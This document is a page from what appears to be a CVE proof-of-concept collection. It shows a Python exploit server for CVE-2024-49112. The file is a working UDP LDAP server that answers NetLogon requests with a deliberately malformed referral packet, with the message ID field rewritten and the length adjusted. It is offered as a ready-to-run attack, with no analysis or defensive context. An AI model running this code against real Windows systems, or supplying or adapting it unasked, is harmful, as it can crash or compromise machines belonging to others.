4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2024-49112. The file may not exist in the repository.
POC / exploit_server.py PY
import asyncio

from logger import logger
from ldaptor.protocols import pureldap
from ldaptor.protocols import pureber

REFERRAL_RESULT_CODE = 10

class LDAPSearchResultDoneRefferal(pureldap.LDAPSearchResultDone):
    def toWire(self):
        elements = [
            pureber.BEREnumerated(self.resultCode),
            pureber.BEROctetString(self.matchedDN),
            pureber.BEROctetString(self.errorMessage),
        ]

        if self.resultCode == 10:  # LDAP referral result code
            if self.referral:
                elements.append(
                    pureber.BERSequence(
                        [pureber.BEROctetString(url) for url in self.referral],
                        tag=0xA3  # Context-specific tag for referral
                    )
                )

        if self.serverSaslCreds:
            elements.append(pureldap.LDAPBindResponse_serverSaslCreds(self.serverSaslCreds))

        return pureber.BERSequence(elements, tag=self.tag).toWire()


def get_malicious_ldap_packet(message_id: int, lm_referral: int=2) -> bytes:
    """
    Build a malicious LDAP response packet with a referral.
    The packet has the following structure:
    Result code: 10 (LDAP referral)
    Referral: ldap://referral.com (valid LDAP URL)
    Message ID: 4 bytes (big-endian) - the same as the original request with lm_referral value.
    """
    if lm_referral == 0 or lm_referral > 255:
        raise ValueError("lm_referral must be between 1 and 255")
    
    if lm_referral & 1:
        raise ValueError("lm_referral must be an even number")

    ldap_search_result = LDAPSearchResultDoneRefferal(resultCode=REFERRAL_RESULT_CODE, referral=['ldap://referral.com'])
    ldap_response_message = pureldap.LDAPMessage(value=ldap_search_result, id=message_id)
    bytes_to_send = ldap_response_message.toWire()

    lm_referral_length_index = bytes_to_send.index(b"\x02\x01") + 1
    message_id_byte = bytes_to_send[lm_referral_length_index + 1].to_bytes(length=1, byteorder='big')

    bytes_to_send = (
        bytes_to_send[:lm_referral_length_index] # Everything before the message ID
        + b"\x04" # Type and Length of the message ID
        + lm_referral.to_bytes(length=1, byteorder='big') # encoded lm_referral
        + b"\x00\x00" # Padding
        + message_id_byte # Message ID
        + bytes_to_send[lm_referral_length_index + 2:] # Rest of the packet
    )

    new_packet_length = bytes_to_send[1] + 3
    bytes_to_send = bytes_to_send[0:1] + new_packet_length.to_bytes(length=1, byteorder='big') + bytes_to_send[2:]

    return bytes_to_send


class LdapServerProtocol(asyncio.DatagramProtocol):
    def __init__(self):
        super().__init__()
        self.berdecoder = pureldap.LDAPBERDecoderContext_TopLevel(
            inherit=pureldap.LDAPBERDecoderContext_LDAPMessage(
                fallback=pureldap.LDAPBERDecoderContext(
                    fallback=pureber.BERDecoderContext()
                ),
                inherit=pureldap.LDAPBERDecoderContext(
                    fallback=pureber.BERDecoderContext()
                ),
            )
        )
        self.transport = None

    def connection_made(self, transport: asyncio.DatagramTransport) -> None:
        self.transport = transport
        logger.info(f"NetLogon connected")

    def datagram_received(self, data: bytes, addr) -> None:
        # Parse the received data
        ldap_message, _ = pureber.berDecodeObject(self.berdecoder, data)
        logger.info(f"Received LDAP request from NetLogon {addr}")

        # Build the "vulnerable" response packet
        vulnerable_ldap_packet = get_malicious_ldap_packet(ldap_message.id)

        logger.info(f"Sending malicious LDAP response packet to {addr}: {vulnerable_ldap_packet}")
        # Send back to client
        self.transport.sendto(vulnerable_ldap_packet, addr)

    def connection_refused(self, exc) -> None:
        logger.error(f"Connection refused: {exc}")

    def error_received(self, exc) -> None:
        logger.error(f"Error received: {exc}")


async def run_exploit_server(listen_port: int):
    loop = asyncio.get_running_loop()
    transport, _ = await loop.create_datagram_endpoint(
        lambda: LdapServerProtocol(),
        local_addr=('0.0.0.0', listen_port)
    )

    try:
        # Keep the server running forever (until Ctrl-C or you close the loop).
        await asyncio.Future()
    except KeyboardInterrupt:
        pass
    finally:
        transport.close()
        logger.info("Server has been shut down.")